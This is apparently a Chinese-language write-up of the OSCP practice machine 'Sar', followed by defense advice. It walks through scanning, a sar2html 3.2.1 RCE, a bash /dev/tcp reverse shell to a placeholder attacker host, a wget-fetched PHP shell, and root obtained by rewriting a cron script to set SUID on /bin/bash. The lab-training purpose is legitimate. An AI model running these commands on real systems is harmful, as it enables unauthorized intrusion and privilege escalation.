OSCP PG—Sar
字数 1226 2025-08-10 14:13:03
OSCP PG—Sar 靶机渗透测试教学文档
0x01 靶机概述
Sar 是一台难度中等的 OSCP 练习靶机,主要涉及以下技术点:
- Web 应用漏洞利用 (sar2html 3.2.1 RCE)
- 反弹 Shell 技巧
- 通过计划任务进行权限提升
- SUID 提权技术
0x02 信息收集阶段
1. 端口扫描
使用 masscan 进行快速端口扫描:
masscan -p 0-65535 192.168.190.35 --rate=10000 -e tun0
发现开放端口:22(SSH)、80(HTTP)
使用 nmap 进行详细服务识别:
nmap -sV -sS -p 22,80 192.168.190.35
2. Web 应用枚举
访问 Web 站点:
- 检查 robots.txt 文件,发现隐藏目录
/sar2HTML - 访问该目录获取后台版本信息:sar2html 3.2.1
0x03 漏洞利用
1. 搜索已知漏洞
使用 searchsploit 查找 sar2html 3.2.1 的已知漏洞:
searchsploit sar2html 3.2.1
发现存在远程代码执行(RCE)漏洞。
2. 获取并利用 EXP
- 获取利用脚本
- 执行系统命令确认漏洞存在
3. 反弹 Shell 技巧
初始反弹 Shell 尝试失败:
bash -c 'bash -i >& /dev/tcp/kali-ip/port 0>&1'
替代方案:
- 确认目标系统是否支持 wget
- 在攻击机上准备反弹 Shell 脚本 (shell.php)
- 启动 Python HTTP 服务:
python3 -m http.server 80
- 在目标系统上下载脚本:
wget 192.168.45.178/shell.php
- 使用 nc 监听反弹 Shell:
nc -lvnp 4444
0x04 权限提升
1. 初始权限确认
获取交互式 Shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
发现存在用户 love 的家目录,但无可利用文件。
2. 常规提权检查
检查以下内容未发现可利用点:
- SUID 文件
- Sudo 权限
- 内核漏洞
3. 计划任务提权
在 /var/www/html 目录发现两个可疑文件:
- finally.sh
- write.sh
检查计划任务:
cat /etc/crontab
发现每5分钟执行一次 write.sh
利用方法:
- 修改 write.sh 内容:
echo "bash -c 'chmod u+s /bin/bash'" > write.sh
- 等待计划任务执行,为 /bin/bash 添加 SUID 权限
- 使用 SUID bash 提权:
/bin/bash -p
0x05 关键总结
-
信息收集要全面:robots.txt 常包含重要信息
-
已知漏洞利用:及时使用 searchsploit 搜索已知漏洞
-
反弹 Shell 技巧:
- 直接反弹失败时可尝试下载脚本方式
- Python HTTP 服务是常用传输方法
-
提权路径:
- 检查 SUID、sudo 权限和计划任务是基本步骤
- 计划任务提权是常见手法
- SUID bash 提权简单有效
-
渗透测试流程:
信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 维持访问 → 清理痕迹
0x06 防御建议
-
针对 sar2html:
- 及时更新到最新版本
- 限制不必要的 Web 应用目录访问
-
针对计划任务提权:
- 设置计划任务文件不可被普通用户修改
- 使用最小权限原则执行计划任务
-
系统加固:
- 移除不必要的 SUID 权限
- 定期审计系统权限设置
-
日志监控:
- 监控可疑的 Web 请求
- 记录计划任务执行情况
通过此靶机练习,可以掌握从 Web 应用到系统提权的完整渗透流程,特别是计划任务和 SUID 提权的实际应用。